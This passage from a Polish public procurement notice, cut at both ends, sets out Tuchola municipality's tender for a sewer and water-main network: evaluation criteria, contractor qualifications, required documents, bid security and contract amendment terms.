budowlane (t.j. Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz ustawy z 16 kwietnia 2004 r. o wyrobach budowlanych (j.t. Dz. U. z 2021 r. poz. 1213 z późn. zm.).<br/>Zastosowane materiały i urządzenia winny odpowiadać deklaracjom zgodności z Polskimi Normami, atestami i aprobatami technicznymi. Podane w niniejszej SWZ, w dokumentacji projektowej, przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót nazwy własne (pochodzenie, producent itd.) mają jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów, produktów, urządzeń czy wyposażenia. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany w dokumentacji konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza od jakości określonego w specyfikacji i dokumentacji budowlanej produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt. <br/>Zamawiający uzna, że oferta jest równoważna, jeżeli przedstawia przedmiot zamówienia <br/>o właściwościach funkcjonalnych i jakościowych takich samych lub lepszych od tych, które zostały określone w SWZ, lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem. Przy czym istotne jest to, że produkt równoważny to produkt, który nie jest identyczny, tożsamy z produktem referencyjnym, ale posiada pewne, istotne dla Zamawiającego, zbliżone do produktu referencyjnego cechy i parametry.<br/>O ile w opisie przedmiotu zamówienia, dokumentacji projektowej, specyfikacjach technicznych wykonania i odbioru robót, przedmiarach robót, wyjaśnieniach do przetargu Zamawiający wskazuje nazwy producentów materiałów, urządzeń, wyrobów itp., oznacza to, że Wykonawca może przyjąć rozwiązania wskazane przez Zamawiającego lub równoważne. Wykonawca musi jednak wykazać, że zastosowane materiały, urządzenia itp. są równoważne. Zamawiający opisując przedmiot zamówienia przez odniesienie do norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp dopuszcza rozwiązania równoważne opisywanym, a odniesieniu takiemu towarzyszą wyrazy „lub równoważne”.<br/>3.13.. Wszelkie informacje niezbędne do przygotowania oferty dostępne są na stronie internetowej prowadzonego postępowanie. Link do postępowania dostępny jest na Profilu Nabywcy zamawiającego: https://platformazakupowa.pl/tuchola. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45232440-8 - Roboty budowlane w zakresie budowy rurociągów do odprowadzania ścieków</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-25</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze ofert Zamawiający kierować się będzie następującym kryterium:<br/>Opis kryteriów oceny Znaczenie<br/>A. cena 60%<br/>B. okres gwarancji jakości 40%<br/>Maksymalna łączna ilość punktów do uzyskania wynosi 100.<br/>A/ KRYTERIUM CENY ŁĄCZNEJ BRUTTO (max. 60 pkt.) – zastosowanie będzie miał następujący wzór, wykorzystywany przy<br/>ocenie oferty:<br/>cena oferowana najniższa<br/>A = --------------------------------------------- x 100 pkt. x 60%<br/>cena oferty badanej<br/>B/ KRYTERIUM OKRESU GWARANCJI JAKOŚCI (max. 40 pkt ) – zastosowanie będzie miał następujący wzór, wykorzystywany<br/>przy ocenie oferty:<br/>okres gwarancji jakości oferty badanej<br/>w miesiącach<br/>B = ---------------------------------------------------------------------- x 100 pkt. x 40%<br/>najdłuższy okres gwarancji jakości spośród<br/>badanych ofert<br/>Minimalny okres gwarancji jakości wynosi 36 miesiące, liczony od dnia odbioru końcowego przedmiotu zamówienia.<br/>Maksymalny okres gwarancji jakości oceniany przez Zamawiającego wynosi 60 miesięcy.<br/>UWAGA!<br/>Podanie w ofercie okresu gwarancji jakości krótszego niż 36 miesiące lub brak podania okresu gwarancji w formularzu ofertowym<br/>będzie skutkować odrzuceniem oferty. W przypadku zaproponowania przez Wykonawcę okresu gwarancji jakości wynoszącego<br/>więcej niż 48 miesięcy oceniona będzie wartość 60 miesięcy.<br/>19.3. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane są punkty za powyższe kryteria. Zastosowanie<br/>będzie miał następujący wzór:<br/>P (punkty) = A + B</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji jakości</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w rozdz. 6 i 7 SWZ oraz spełniają warunki udziału w postępowaniu<br/>w zakresie:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny,<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny,<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w<br/>sposób szczególny,<br/>4) zdolności technicznej lub zawodowej:<br/>A (dotyczy wykazu robót)<br/>Wykonawca wykaże, że zrealizował należycie min. jedną robotę polegającą na:<br/>- budowie sieci kanalizacji sanitarnej o dł. min. 100 mb i na budowie sieci wodociągowej o dł. min. 100 mb<br/>oraz aby dołączył do ww. wykazu min. 1 szt. referencji na wykonane roboty/ każdej z robót.<br/>Roboty ww. Wykonawca może wykazać poprzez ich wykonanie w jednym zadaniu lub oddzielnie.<br/>Zamawiający uzna, że Wykonawca spełnia ww. warunek udziału w postępowaniu jeżeli przedstawi w wykazie wykonanych<br/>robót (w ostatnich 5 latach) – roboty wykonane, podając ich rodzaj, wartość, datę, miejsce wykonania i podmioty na rzecz,<br/>których roboty zostały wykonane, według wzoru stanowiącego załącznik nr 9 do SWZ wraz z dowodami dot. robót<br/>wskazanych w wykazie robót, potwierdzającym, że robota budowlana została wykonana należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały<br/>wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>odpowiednie dokumenty.<br/>B (dotyczy wykazu osób): skieruje do realizacji przedmiotowego zamówienia min. po jednej osobie z niżej wymienionych<br/>branży posiadającą uprawnienia do kierowania i nadzorowania robotami budowlanymi w zakresie odpowiadającym<br/>wymienionym niżej branżom lub posiadającą inne uprawnienia umożliwiające wykonywanie tych samych czynności, dowykonywania których w aktualnym stanie prawnym uprawniają uprawnienia budowlane wymienionych specjalności:<br/> kierownika robót br. sanitarnej, posiadającą uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie<br/>sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych,<br/>oraz będącymi członkami właściwej Izby Inżynierów Budownictwa.,<br/>Wykonawca skieruje do realizacji zamówienia ww. osoby, które w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo<br/>budowlane (t. j. Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz Rozporządzenia Ministra Inwestycji i Rozwoju z dn. 29.04.2019<br/>r. w sprawie przygotowania zawodowego posiadają niezbędne kwalifikacje do wykonywania samodzielnych funkcji<br/>technicznych w budownictwie (Dz.U. z 2019 r. poz. 831).<br/>Dopuszcza się łączenie funkcji, o których mowa powyżej, przez jedną osobę pod warunkiem, że osoba ta będzie posiadała<br/>wymagane kwalifikacje.<br/>Zamawiający, określając wymogi w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im<br/>uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im<br/>uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z<br/>zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo Budowlane (t. j. Dz. U. z 2024 r. poz. 725 z późn. zm.) oraz<br/>ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (t. j.Dz. U. z<br/>2021 r. poz. 1646).<br/>8.2.Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności ,jeżeli<br/>posiadane przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">b) W celu potwierdzenia<br/>braku podstaw do wykluczenia:<br/>- oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 1616 ze zm.), z innym<br/>wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej,<br/>według wzoru stanowiącego załącznik nr 7 do SWZ.<br/>- oświadczenie Wykonawcy o aktualności oświadczenia składanego na podst. art. 125 ust.1.ustawy Pzp oraz art. 7 ust. 1 ustawy z<br/>dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służących<br/>ochronie bezpieczeństwa narodowego (Dz.U. z 2024r. poz. 507 ze zm.). według wzoru stanowiącego załącznik nr 11 do SWZ;<br/>9.3. Jeżeli Wykonawca nie złożył oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, podmiotowych środków dowodowych,<br/>innych dokumentów lub oświadczeń składanych w postępowaniu lub są one niekompletne lub zawierają błędy, Zamawiający wzywa<br/>Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że oferta wykonawcy<br/>podlega odrzuceniu, bez względu na ich złożenie, uzupełnienie lub poprawienie lub zachodzą przesłanki unieważnienia<br/>postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający na podst. art. 274 ust. Pzp wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym,<br/>nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień składania, chyba że<br/>Zamawiający jest w posiadaniu lub ma dostęp do tych podmiotowych środków dowodowych tj.:<br/>a) W celu potwierdzenia spełnienia przez Wykonawcę warunków udziału w postępowaniu:<br/>1) wykaz wykonanych robót budowlanych, (przynajmniej jedna robota budowlana)<br/>wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z<br/>podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane, według wzoru<br/>stanowiącego załącznik nr 9 do SWZ wraz z dowodami dot. robót wskazanych w wykazie robót budowlanych, potwierdzającymi, że<br/>roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez<br/>podmiot, na rzecz którego roboty budowlane zostały wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami według wzoru stanowiącego<br/>załącznik nr 6.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta i załączniki do ofert powinny być sporządzone i złożone zgodnie z wymaganiami<br/>określonymi w SWZ w języku polskim.<br/>10.2.Wykonawca może złożyć tylko jedną ofertę. Złożenie przez Wykonawcę więcej niż jednej<br/>oferty, spowoduje odrzucenie ofert na podstawie art. 226 ust. 1 pkt 3 ustawy Pzp.<br/>10.3. Ofertę składa się przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl.<br/>10.4. Oferta musi zostać podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem<br/>osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>3) podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać<br/>„Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do<br/>transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014 - od 1 lipca 2016 roku”.<br/>4) w przypadku wykorzystania formatu podpisu XAdES zewnętrzny Zamawiający wymaga dołączenia odpowiedniej ilości<br/>plików tj. podpisywanych plików z danymi oraz plików podpisu w formacie XAdES.<br/>10.5. Ofertę składa się na formularzu ofertowym – zgodnie z załącznikiem nr 2 do SWZ.<br/>Wraz z ofertą Wykonawca jest zobowiązany złożyć:<br/>1) Pełnomocnictwo (jeżeli dotyczy) wzór pełnomocnictwa załącznik nr 8 - dla osoby podpisującej ofertę do występowania w<br/>imieniu wykonawcy, jeżeli nie wynika to bezpośrednio z dokumentów rejestrowych lub w przypadku o którym mowa w art. 58<br/>ust. 2 ustawy Prawo zamówień publicznych.<br/>Pełnomocnictwo do złożenia oferty musi być złożone w oryginale w takiej samej formie, jak składana oferta (tj. w formie<br/>elektronicznej podpisanej kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym). Dopuszcza się także złożenie elektronicznej kopii (skanu) pełnomocnictwa<br/>sporządzonego uprzednio w formie pisemnej, w formie elektronicznego poświadczenia sporządzonego stosownie do art. 97<br/>§ 2 ustawy z dnia 14.02.1991r. – Prawo o notariacie, które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa sporządzonego uprzednio w formie pisemnej<br/>kwalifikowanym podpisem, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia pełnomocnictwa<br/>nie może być uwierzytelniona przez upełnomocnionego.<br/>2) Oświadczenia wymienione w rozdziale 9 pkt 1 niniejszej SWZ tj.a) oświadczenie na podstawie art. 125 ust. 1 ustawy Pzp -<br/>załącznik nr 3 do SWZ<br/>b) oświadczenie składane na podstawie art. 117 ust. 4 Pzp – dotyczy tylko wykonawców wspólnie ubiegających się o<br/>zamówienie, zgodnie z załącznikiem nr 10 do SWZ.<br/>c) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z oświadczeniem, o którym mowa w pkt. 9.1) SWZ, także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu,<br/>w zakresie, w jakim wykonawca powołuje się na jego zasoby, zgodnie z załącznikiem nr 4 do SWZ.<br/>d) zobowiązanie podmiotu udostępniającego zasoby – w przypadku gdy wykonawca polega na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania<br/>mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia, zgodnie ze wzorem stanowiącym<br/>załącznik nr 5 do SWZ lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,<br/>będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>3) dowód potwierdzający wniesienie wadium. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium wskazując tytuł:<br/>„Budowa sieci kanalizacji sanitarnej oraz sieci wodociągowej rozdzielczej w ul. Wincentego Witosa w Tucholi”<br/>wadium, nr postępowania ZP.271.2.13.2025.AS<br/>Zamawiający wymaga wniesienia wadium, w wysokości: 3 000,00 zł (słownie: trzy tysiące zł 00/100).<br/>15.2. Wadium wniesione w pieniądzu będzie wniesione skutecznie, jeżeli rachunek bankowy<br/>Zamawiającego zostanie uznany kwotą wadium przed upływem terminu składania ofert (tj. przed upływem dnia i godziny<br/>wyznaczonej jako ostateczny termin składania ofert).<br/>15.3. Wadium w pieniądzu należy wnieść przelewem na konto Zamawiającego:<br/>Bank Spółdzielczy w Tucholi Nr 15 8174 0004 0000 2163 2000 0005<br/>15.4. Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2019 r. ze zm. poz. 310, 836 i 1572).<br/>15.5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>15.6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 15.4.<br/>ppkt 2)-4), Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w<br/>postaci elektronicznej, podpisany kwalifikowanym podpisem elektronicznym przez wystawcę<br/>dokumentu.<br/>15.7. W przypadku wniesienia wadium w innej formie niż w pieniądzu, z treści gwarancji i poręczeń<br/>musi wynikać bezwarunkowe, nieodwołalne i na pierwsze żądanie Zamawiającego<br/>(beneficjenta) zobowiązanie Gwaranta do zapłaty na rzecz Zamawiającego kwoty wadium<br/>w okolicznościach skutkujących zatrzymaniem wadium określonych w art. 98 ust. 6<br/>ustawy Pzp.<br/>15.8. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie<br/>utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp, zostanie odrzucona.<br/>15.9. Zamawiający niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wnioskuprzez Wykonawcę zwraca wadium Wykonawcy:<br/>1) który wycofał ofertę przed upływem terminu składania ofert;<br/>2) którego oferta została odrzucona;<br/>3) po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4) po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo<br/>nie upłynął termin do jego wniesienia.<br/>15.10. Złożenie wniosku o zwrot wadium, o którym mowa w pkt 15.9, powoduje rozwiązanie stosunku prawnego z<br/>wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej.<br/>Szczegółowe informacje dotyczące wadium zawarto w rozdziale 15 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia<br/>umowyw sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>18.2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenie,<br/>o którym mowa w rozdziale 9 pkt 9.1., składa każdy z Wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim<br/>każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>18.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączą do oferty oświadczenie,<br/>z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>18.4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Strony postanawiają, że wynagrodzenie za przedmiot umowy będzie następowało w II transzach:<br/>- I transza – po I kwartale robót – po dokonaniu protokolarnego potwierdzenia wartości i stanu zaawansowania prac. Rozliczenie częściowe nie może przekroczyć jednak wartości 70% wartości wynagrodzenia brutto określonego w § 3 ust. 1 niniejszej umowy. <br/>- II transza – pozostała kwota wynagrodzenia – wypłacona po zakończeniu inwestycji nastąpi po uzyskaniu przez Wykonawcę protokolarnego bezusterkowego odbioru końcowego przedmiotu umowy i złożeniu faktury końcowej w siedzibie Zamawiającego. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, określone zostały w załączniku nr 12 do SWZ.<br/>21.2. Zgodnie z załącznikiem nr 12 do SWZ – wzorem umowy, Zamawiający dopuszcza możliwość<br/>wprowadzenia zmian umowy na podstawie art. 455 ustawy Prawo zamówień publicznych (Dz. U. z 2024 r. poz. 1320 z późn.<br/>zm.) w następujących przypadkach:<br/>21.3. . Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:<br/>1) W zakresie zmiany terminu wykonania:<br/>a) z powodu wystąpienia nie zinwentaryzowanych urządzeń podziemnych i związanych z tym kolizji,<br/>b) z powodu nie przewidzianego braku płynności finansowej u Zamawiającego,<br/>c) wystąpienia siły wyższej i innych zdarzeń nadzwyczajnych,<br/>d) z powodu ujawnienia się wad/braków/błędów w dokumentacji projektowej skutkujących niemożliwością dochowania<br/>pierwotnego terminu realizacji umowy,<br/>e) z powodu wystąpienia klęsk żywiołowych,<br/>f) w przypadku wystąpienia okoliczności niezależnych od stron, związanych z zaistnieniem warunków atmosferycznych<br/>uniemożliwiających wykonywanie robót zgodnie z ich przewidywaną technologią wykonania, także przeprowadzania prób i<br/>sprawdzeń zgodnie z technologią przewidzianą przez producentów, termin realizacji zamówienia może zostać wydłużony,<br/>g) z powodu warunków geologicznych, archeologicznych, terenowych, w szczególności:<br/>- niewypałów i niewybuchów;<br/>- wykopalisk archeologicznych;<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (kategorie gruntu, kurzawka, głazy<br/>narzutowe, warunki gruntowe itp.);<br/>- odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, w szczególności istnienie podziemnych<br/>sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty itp.);h) w związku z wystąpieniem następstw działania organów administracji, które w szczególności dotyczyć będą:<br/>- przekroczenia zakreślonych przez prawo terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień<br/>itp.;<br/>- odmowy wydania przez organy administracji wymaganych decyzji, zezwoleń, uzgodnień na skutek błędów w dokumentacji<br/>projektowej;<br/>i) w związku z zaistnieniem uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do<br/>dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron;<br/>(...)<br/>Zgodnie ze wzorem umowy - zał. nr 12 do SWZ paragraf 19. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-24 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Za pośrednictwem platformy zakupowej: https://platformazakupowa.pl/tuchola</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-24 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-23</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> przewidziana w art. 7 ust.1. ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania<br/>wspierania agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022r. poz. 835) .<br/>Wymaganejest oświadczenie o niepodleganiu wykluczeniu na podst. w.w. ustawy. Zapis o niepodleganiu umieszczono w<br/>oświadczeniu<br/>składanym na podst. art.125 ust.1 ust. Pzp (zał.3, zał.4 do SWZ) oraz oświadczeniu o aktualności oświadczenia wykonawcy<br/>o niepodleganiu wykluczeniu (zał. nr 11 do SWZ). Zamawiający zawrze umowę z Wykonawcą, który złożył najkorzystniejszą<br/>ofertę w niniejszym postępowaniu.<br/>20.2. Zamawiający zawiera umowę w sprawie zamówienia publicznego, z uwzględnieniem art. 577 ustawy Pzp, w terminie<br/>nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jeżeli zawiadomienie to zostało<br/>przesłane przy użyciu środków komunikacji elektronicznej, albo 10 dni, jeżeli zostało przesłane w inny sposób.<br/>20.3. Zamawiający może zawrzeć umowę w sprawie zamówienia publicznego przed upływem terminu, o którym mowa w pkt<br/>20.2, jeżeli w postępowaniu o udzielenie zamówienia w trybie podstawowym złożono tylko jedną ofertę.<br/>20.4. Wykonawca, którego oferta uznana zostanie za najkorzystniejszą, będzie zobowiązany zawrzeć umowę w sprawie<br/>zamówienia na warunkach określonych w projektowanych postanowieniach umowy, które stanowią załącznik nr 12 do SWZ.<br/>Umowa zostanie uzupełniona o zapisy wynikające ze złożonej oferty.<br/>20.5. Wykonawca, przed podpisaniem umowy, powinien przedłożyć:<br/>- w przypadku konsorcjum lub spółki cywilnej - umowę regulującą współpracę Wykonawców działających wspólnie (umowa<br/>konsorcjum lub umowa spółki cywilnej).<br/>20.6. Jeżeli Wykonawca, którego oferta została wybrana jako najkorzystniejsza, uchyla się od zawarcia umowy w sprawie<br/>zamówienia publicznego, Zamawiający może dokonać ponownego badania i oceny ofert spośród ofert pozostałych w<br/>postępowaniu Wykonawców albo unieważnić postępowanie (art. 263 ustawy Pzp).<br/>Wykonawca, którego oferta została wybrana jako najkorzystniejsza, zostanie poinformowany przez 